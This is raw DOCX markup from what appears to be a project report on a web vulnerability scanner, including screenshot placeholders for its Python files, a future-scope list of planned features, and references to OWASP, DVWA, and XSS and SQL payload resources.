      <w:bookmarkStart w:id="100" w:name="_Toc2038"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Coding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>main.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5725795" cy="4439920"/>
            <wp:effectExtent l="0" t="0" r="4445" b="10160"/>
            <wp:docPr id="46" name="Picture 46" descr="Screenshot 2024-05-31 21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5-31 215412"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5725795" cy="4439920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Injection.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5728335" cy="3312795"/>
            <wp:effectExtent l="0" t="0" r="1905" b="9525"/>
            <wp:docPr id="47" name="Picture 47" descr="Screenshot 2024-05-31 21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5-31 215442"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="40618"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5728335" cy="3312795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5728335" cy="2041525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49" name="Picture 49" descr="Screenshot 2024-05-31 21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05-31 215442"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect t="61026"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5728335" cy="2041525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5729605" cy="6405880"/>
            <wp:effectExtent l="0" t="0" r="635" b="10160"/>
            <wp:docPr id="48" name="Picture 48" descr="Screenshot 2024-05-31 21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05-31 215532"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5729605" cy="6405880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Crawler.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5725795" cy="6845300"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12700"/>
            <wp:docPr id="50" name="Picture 50" descr="Screenshot 2024-05-31 22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5-31 220038"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5725795" cy="6845300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5730240" cy="6512560"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:docPr id="51" name="Picture 51" descr="Screenshot 2024-05-31 22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05-31 220110"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730240" cy="6512560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="101" w:name="_kj67o9bqquac" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkStart w:id="102" w:name="_Toc43339197"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc10020"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Future Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Additional Vulnerability Detection</w:t>
      </w:r>
      <w:r>
        <w:t>: Expand the scanner to detect and report on a wider range of vulnerabilities beyond XSS and SQL injection, such as CSRF, RCE, broken authentication, and security misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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7"/>
        </w:rPr>
        <w:t>Enhanced Reporting</w:t>
      </w:r>
      <w:r>
        <w:t>: Improve the reporting module to provide more detailed and user-friendly reports. Include recommendations for remediation and prioritize vulnerabilities based on severity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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7"/>
        </w:rPr>
        <w:t>Compliance</w:t>
      </w:r>
      <w:r>
        <w:t>: Enhance the scanner to help organizations comply with various security standards and regulations, such as GDPR, PCI DSS, and HIPAA, by providing specific vulnerability checks and reporting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Advanced Threat Intelligence</w:t>
      </w:r>
      <w:r>
        <w:t>: Incorporate threat intelligence feeds and machine learning algorithms to enhance the scanner's ability to detect new and evolving threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc43339198"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc21802"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pP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OWASP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"https://github.com/OWASP/OWASP-VWAD"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https://github.com/OWASP/OWASP-VWAD</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r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>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Vulnweb App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"https://github.com/lotusirous/vulnwebcollection"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https://github.com/lotusirous/vulnwebcollection</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DVWA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"https://github.com/digininja/DVWA"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https://github.com/digininja/DVWA</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XSS Injection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"https://portswigger.net/web-security/cross-site-scripting/cheat-sheet"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https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</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SQL Injection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"https://portswigger.net/web-security/sql-injection/cheat-sheet"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https://portswigger.net/web-security/sql-injection/cheat-sheet</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Selenium Documentation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"https://www.selenium.dev/documentation/en/"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https://www.selenium.dev/documentation/en/</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Xss Payloads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"https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Intruders/xss_alert.txt"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https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Intruders/xss_alert.txt</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p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">SQL Payloads : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/xmendez/wfuzz/blob/master/wordlist/Injections/SQL.txt" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>https://github.com/xmendez/wfuzz/blob/master/wordlist/Injections/SQL.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId7" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="810" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
      <w:pgBorders w:offsetFrom="page">
        <w:top w:val="single" w:color="auto" w:sz="18" w:space="24"/>
        <w:left w:val="single" w:color="auto" w:sz="18" w:space="24"/>
        <w:bottom w:val="single" w:color="auto" w:sz="18" w:space="24"/>
        <w:right w:val="single" w:color="auto" w:sz="18" w:space="24"/>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PMingLiU">
    <w:altName w:val="Microsoft JhengHei UI"/>
    <w:panose1 w:val="02010601000101010101"/>
    <w:charset w:val="88"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000010" w:usb3="00000000" w:csb0="00100000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Batang">
    <w:altName w:val="Malgun Gothic"/>
    <w:panose1 w:val="02030600000101010101"/>
    <w:charset w:val="81"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000010" w:usb3="00000000" w:csb0="00080000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Arial Unicode MS">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="80"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="0000003F" w:usb3="00000000" w:csb0="003F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Roboto">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sdt>
      <w:sdtPr>
        <w:id w:val="-1758357024"/>
        <w:docPartObj>
          <w:docPartGallery w:val="autotext"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent/>
    </w:sdt>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="13"/>
    </w:pPr>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sdt>
      <w:sdtPr>
        <w:id w:val="-1758357024"/>
        <w:docPartObj>
          <w:docPartGallery w:val="autotext"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent/>
    </w:sdt>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="13"/>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C3D78"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="80EC3D78"/>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81D9DB0A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="81D9DB0A"/>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
    <w:nsid w:val="83E002B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83E002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BAF7BA6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8BAF7BA6"/>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4">
    <w:nsid w:val="A1BBB4A3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A1BBB4A3"/>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5">
    <w:nsid w:val="A9E632C0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A9E632C0"/>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6">
    <w:nsid w:val="AAE00729"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AAE007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F320B91"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AF320B9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8">
    <w:nsid w:val="B5566ADA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B5566ADA"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9">
    <w:nsid w:val="B9D70D33"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B9D70D33"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10">
    <w:nsid w:val="BDB9FFB8"/>
